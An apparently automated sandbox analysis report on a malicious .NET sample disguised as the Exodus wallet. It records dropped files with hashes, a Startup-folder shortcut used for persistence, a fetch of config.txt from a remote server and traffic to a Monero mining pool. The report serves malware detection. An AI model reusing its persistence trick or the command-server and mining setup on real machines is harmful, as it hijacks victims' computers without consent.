                                                                                                                                        SSDEEP:12:AnqXm/Ey6q9995RiS1mK2P3qQ10nMCldimE8eawHza1mKQ:Yfl68T1iPLyMCldzE9BHza1M
                                                                                                                                        MD5:B29A25E97FA88A6DD5536BB938395E34
                                                                                                                                        SHA1:38139615A7455B20F5A7D93D08EAFC5A2D73797C
                                                                                                                                        SHA-256:2021C527B7EBCAA1359CE6E80E10C6472AAC350E608E545494810A4E70D901FE
                                                                                                                                        SHA-512:C50F0259AA6DAC7A58F4052CE516D3EB88EEB4AD17F3AE580321DAED1AB4526923DB7447E7B2694ED4457C438754205A852AA0A730F700F3F28AF3E433E9B4CC
                                                                                                                                        Malicious:false
                                                                                                                                        C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        Process:C:\Users\user\Desktop\P7Oa6i5muL.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2241536
                                                                                                                                        Entropy (8bit):7.994950828794957
                                                                                                                                        Encrypted:true
                                                                                                                                        SSDEEP:49152:7wFpwLN5DX5ecu7O4jrimxMHDUrY+BPOIz8uJxLWuXoK:8wLf8qHa1eunvXoK
                                                                                                                                        MD5:9DBCF183762872D8917B8A19535A0C65
                                                                                                                                        SHA1:94D27127F8FFBEBEC6AD803599ED3C0477A15E3C
                                                                                                                                        SHA-256:759D3E20098353E73C0C417ECF755A3AB24CDF7EAD10DF8C5A4AAB549D7423F2
                                                                                                                                        SHA-512:CD3FB751C0360DF6865633D72633403C0802153727FE75951E842227B4237970DF999229C73D1E94D9E0F0B0442EC58EC59024836EBEF3F7605254BC6A4F82B6
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                         Preview:
                                                                                                                                        C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe:Zone.Identifier
                                                                                                                                        Process:C:\Users\user\Desktop\P7Oa6i5muL.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):26
                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
                                                                                                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<"file:///C:\ProgramData\LKBNMTFJgl\csrss.exe">), ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):69
                                                                                                                                        Entropy (8bit):5.096227769358395
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:HRAbABGQYm8h6rXZkRE4rsjvKaBCH:HRYFVm8hAW1rsjv/E
                                                                                                                                        MD5:E03E6937BA1878ACE3D849B233ADECFE
                                                                                                                                        SHA1:AFFBB4F8B53AF6CF35660B775A0A8F70FB95F8B5
                                                                                                                                        SHA-256:9846A8975F8E2DBC96CD18D5015C03B4D8226FDDF69BCB99A0610C855B0A9E6D
                                                                                                                                        SHA-512:99EA03B8635D89409C6E65DC1DD1E995EAC8C02E373F3B01FAA7D715F347722075CC0D5D629914399505A2CA8FFB80BFA8CAFA9D99A2E702D1FCD94FB0BAECA9
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url, Author: @itsreallynick (Nick Carr)
                                                                                                                                        Preview: [InternetShortcut]..URL="file:///C:\ProgramData\LKBNMTFJgl\csrss.exe"
                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):55
                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):906
                                                                                                                                        Entropy (8bit):3.1451406488401816
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:58KRBubdpkoF1AG3rlsYLVIDk9+MlWlLehB4yAq7ejCEsYLVIO:OaqdmuF3rl9d+kWReH4yJ7MN9H
                                                                                                                                        MD5:D3DD590B4944060970ACE29E564EEA27
                                                                                                                                        SHA1:A716EACE283B105F36D76F23208714738AC47D8D
                                                                                                                                        SHA-256:7DE2EB030E51A0FC4F96F9C751DBCEA3BFC2770DE398598C073350A96645B8B6
                                                                                                                                        SHA-512:CEEC4B3A251D203E6745AB7114A237A2549378CA014BDC79EBF9A1E91DEB73E3ECA94F172E36E95F8E5CEABB3B366ACCE26A10CAC6D3E03B298AA65C4BB5AD78
                                                                                                                                        Malicious:false
                                                                                                                                         Preview: -------------------------------------------------------------------------------------  MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable  Start Time: Wed Jul 14 2021 07:05:41  MpEnsureProcessMitigationPolicy: hr = 0x1  WDEnable  ERROR: MpWDEnable(TRUE) failed (800704EC)  MpCmdRun: End Time: Wed Jul 14 2021 07:05:41  -------------------------------------------------------------------------------------

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Entropy (8bit):7.994950828794957
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                        File name:P7Oa6i5muL.exe
                                                                                                                                        File size:2241536
                                                                                                                                        MD5:9dbcf183762872d8917b8a19535a0c65
                                                                                                                                        SHA1:94d27127f8ffbebec6ad803599ed3c0477a15e3c
                                                                                                                                        SHA256:759d3e20098353e73c0c417ecf755a3ab24cdf7ead10df8c5a4aab549d7423f2
                                                                                                                                        SHA512:cd3fb751c0360df6865633d72633403c0802153727fe75951e842227b4237970df999229c73d1e94d9e0f0b0442ec58ec59024836ebef3f7605254bc6a4f82b6
                                                                                                                                        SSDEEP:49152:7wFpwLN5DX5ecu7O4jrimxMHDUrY+BPOIz8uJxLWuXoK:8wLf8qHa1eunvXoK
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....BT...............0... .........F. .. .... ...@.. ........................"...........@................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:d46df4696cecedd2

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x60a646
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:false
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                        Time Stamp:0x91544293 [Sun Apr 7 02:53:07 2047 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                        Entrypoint Preview

                                                                                                                                        Instruction
                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x20a5f4 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x20c000 | 0x1a800 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x228000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x20a5d8 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x20864c | 0x208800 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x20c000 | 0x1a800 | 0x1a800 | False | 0.81779739092 | data | 7.59703560029 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x228000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x20c240 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x20c378 | 0x2e8 | data | |
RT_ICON | 0x20c670 | 0x668 | dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x20cce8 | 0x568 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x20d260 | 0x8a8 | data | |
RT_ICON | 0x20db18 | 0xea8 | data | |
RT_ICON | 0x20e9d0 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x20ee48 | 0x10a8 | data | |
RT_ICON | 0x20ff00 | 0x25a8 | data | |
RT_ICON | 0x2124b8 | 0x6029 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_ICON | 0x2184f4 | 0xdccc | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0x2261d0 | 0xa0 | data | |
RT_VERSION | 0x226280 | 0x37e | data | |
RT_MANIFEST | 0x226610 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright (c) 2015-2021 Exodus Movement, Inc.
Assembly Version | 21.7.2.0
InternalName | notepad.exe
FileVersion | 21.7.2.0
CompanyName | Exodus Movement Inc
LegalTrademarks |
Comments | Exodus
ProductName | Exodus
ProductVersion | 21.7.2.0
FileDescription | Exodus
OriginalFilename | notepad.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 14, 2021 07:04:11.334321976 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:04:11.362827063 CEST | 80 | 49719 | 45.144.225.135 | 192.168.2.3
Jul 14, 2021 07:04:11.363018990 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:04:11.363482952 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:04:11.392014027 CEST | 80 | 49719 | 45.144.225.135 | 192.168.2.3
Jul 14, 2021 07:04:11.392051935 CEST | 80 | 49719 | 45.144.225.135 | 192.168.2.3
Jul 14, 2021 07:04:11.392072916 CEST | 80 | 49719 | 45.144.225.135 | 192.168.2.3
Jul 14, 2021 07:04:11.392119884 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:04:11.392133951 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:04:12.629949093 CEST | 49721 | 14444 | 192.168.2.3 | 144.217.14.139
Jul 14, 2021 07:04:12.742824078 CEST | 14444 | 49721 | 144.217.14.139 | 192.168.2.3
Jul 14, 2021 07:04:12.743212938 CEST | 49721 | 14444 | 192.168.2.3 | 144.217.14.139
Jul 14, 2021 07:04:12.743839979 CEST | 49721 | 14444 | 192.168.2.3 | 144.217.14.139
Jul 14, 2021 07:04:12.855171919 CEST | 14444 | 49721 | 144.217.14.139 | 192.168.2.3
Jul 14, 2021 07:04:13.030257940 CEST | 14444 | 49721 | 144.217.14.139 | 192.168.2.3
Jul 14, 2021 07:04:13.083268881 CEST | 49721 | 14444 | 192.168.2.3 | 144.217.14.139
Jul 14, 2021 07:04:16.396761894 CEST | 80 | 49719 | 45.144.225.135 | 192.168.2.3
Jul 14, 2021 07:04:16.396883011 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:04:48.866415024 CEST | 14444 | 49721 | 144.217.14.139 | 192.168.2.3
Jul 14, 2021 07:04:49.037607908 CEST | 49721 | 14444 | 192.168.2.3 | 144.217.14.139
Jul 14, 2021 07:04:56.145824909 CEST | 14444 | 49721 | 144.217.14.139 | 192.168.2.3
Jul 14, 2021 07:04:56.225605011 CEST | 49721 | 14444 | 192.168.2.3 | 144.217.14.139
Jul 14, 2021 07:05:56.710599899 CEST | 14444 | 49721 | 144.217.14.139 | 192.168.2.3
Jul 14, 2021 07:05:56.840178013 CEST | 49721 | 14444 | 192.168.2.3 | 144.217.14.139
Jul 14, 2021 07:05:58.707011938 CEST | 49721 | 14444 | 192.168.2.3 | 144.217.14.139
Jul 14, 2021 07:06:01.310838938 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:06:01.716926098 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:06:02.418819904 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:06:03.715773106 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:06:06.216115952 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135
Jul 14, 2021 07:06:11.107098103 CEST | 49719 | 80 | 192.168.2.3 | 45.144.225.135

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 14, 2021 07:03:45.599698067 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:45.615533113 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:46.203552961 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:46.217386961 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:46.939202070 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:46.952008009 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:47.717214108 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:47.729578018 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:48.123855114 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:48.144217968 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:48.621572971 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:48.634825945 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:49.408323050 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:49.421190977 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:50.480515957 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:50.493535995 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:51.395421982 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:51.410017967 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:52.400088072 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:52.412940979 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:53.408324003 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:53.421097040 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:54.881628036 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:54.895257950 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:56.013209105 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:56.026211977 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:56.800204992 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:56.813143015 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:58.810767889 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:58.823700905 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:03:59.669223070 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:03:59.682320118 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:00.864523888 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:00.878118038 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:09.139568090 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:09.154616117 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:11.089646101 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:11.102499008 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:12.063724041 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:12.078748941 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:12.599672079 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:12.621329069 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:21.355102062 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:21.381994009 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:28.174298048 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:28.193172932 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:53.476847887 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:53.586257935 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:54.409327984 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:54.608023882 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:55.113377094 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:55.127599955 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:55.461149931 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:55.582252979 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:55.999085903 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:56.012989998 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Jul 14, 2021 07:04:56.626780033 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Jul 14, 2021 07:04:56.641124964 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:57.149454117 CEST5898753192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:57.163265944 CEST53589878.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:57.942661047 CEST5657953192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:57.955780983 CEST53565798.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:58.918448925 CEST6063353192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:58.933700085 CEST53606338.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:59.520582914 CEST6129253192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:59.535106897 CEST53612928.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:05:54.282412052 CEST6361953192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:05:54.309309959 CEST53636198.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:06:01.634870052 CEST6493853192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:06:01.656538963 CEST53649388.8.8.8192.168.2.3

                                                                                                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 14, 2021 07:04:12.599672079 CEST | 192.168.2.3 | 8.8.8.8 | 0xecea | Standard query (0) | xmr-us-east1.nanopool.org | A (IP address) | IN (0x0001)
Jul 14, 2021 07:06:01.634870052 CEST | 192.168.2.3 | 8.8.8.8 | 0x5a8e | Standard query (0) | xmr-us-east1.nanopool.org | A (IP address) | IN (0x0001)

                                                                                                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 14, 2021 07:04:12.621329069 CEST | 8.8.8.8 | 192.168.2.3 | 0xecea | No error (0) | xmr-us-east1.nanopool.org | | 142.44.242.100 | A (IP address) | IN (0x0001)
Jul 14, 2021 07:04:12.621329069 CEST | 8.8.8.8 | 192.168.2.3 | 0xecea | No error (0) | xmr-us-east1.nanopool.org | | 142.44.243.6 | A (IP address) | IN (0x0001)
Jul 14, 2021 07:04:12.621329069 CEST | 8.8.8.8 | 192.168.2.3 | 0xecea | No error (0) | xmr-us-east1.nanopool.org | | 144.217.14.109 | A (IP address) | IN (0x0001)
Jul 14, 2021 07:04:12.621329069 CEST | 8.8.8.8 | 192.168.2.3 | 0xecea | No error (0) | xmr-us-east1.nanopool.org | | 192.99.69.170 | A (IP address) | IN (0x0001)
Jul 14, 2021 07:04:12.621329069 CEST | 8.8.8.8 | 192.168.2.3 | 0xecea | No error (0) | xmr-us-east1.nanopool.org | | 144.217.14.139 | A (IP address) | IN (0x0001)
Jul 14, 2021 07:06:01.656538963 CEST | 8.8.8.8 | 192.168.2.3 | 0x5a8e | No error (0) | xmr-us-east1.nanopool.org | | 144.217.14.109 | A (IP address) | IN (0x0001)
Jul 14, 2021 07:06:01.656538963 CEST | 8.8.8.8 | 192.168.2.3 | 0x5a8e | No error (0) | xmr-us-east1.nanopool.org | | 144.217.14.139 | A (IP address) | IN (0x0001)
Jul 14, 2021 07:06:01.656538963 CEST | 8.8.8.8 | 192.168.2.3 | 0x5a8e | No error (0) | xmr-us-east1.nanopool.org | | 142.44.243.6 | A (IP address) | IN (0x0001)
Jul 14, 2021 07:06:01.656538963 CEST | 8.8.8.8 | 192.168.2.3 | 0x5a8e | No error (0) | xmr-us-east1.nanopool.org | | 192.99.69.170 | A (IP address) | IN (0x0001)
Jul 14, 2021 07:06:01.656538963 CEST | 8.8.8.8 | 192.168.2.3 | 0x5a8e | No error (0) | xmr-us-east1.nanopool.org | | 142.44.242.100 | A (IP address) | IN (0x0001)

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • 45.144.225.135

                                                                                                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49719 | 45.144.225.135 | 80 | C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
Timestamp | kBytes transferred | Direction | Data
Jul 14, 2021 07:04:11.363482952 CEST | 1403 | OUT | GET /config.txt HTTP/1.1
Accept: text/*, application/exe, application/zlib, application/gzip, application/applefile
User-Agent: WinInetGet/0.1
Host: 45.144.225.135
Connection: Keep-Alive
Cache-Control: no-cache
Jul 14, 2021 07:04:11.392051935 CEST | 1405 | IN | HTTP/1.1 200 OK
Date: Wed, 14 Jul 2021 05:04:11 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 13 Jul 2021 21:08:29 GMT
ETag: "776-5c707a3b80d40"
Accept-Ranges: bytes
Content-Length: 1910
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
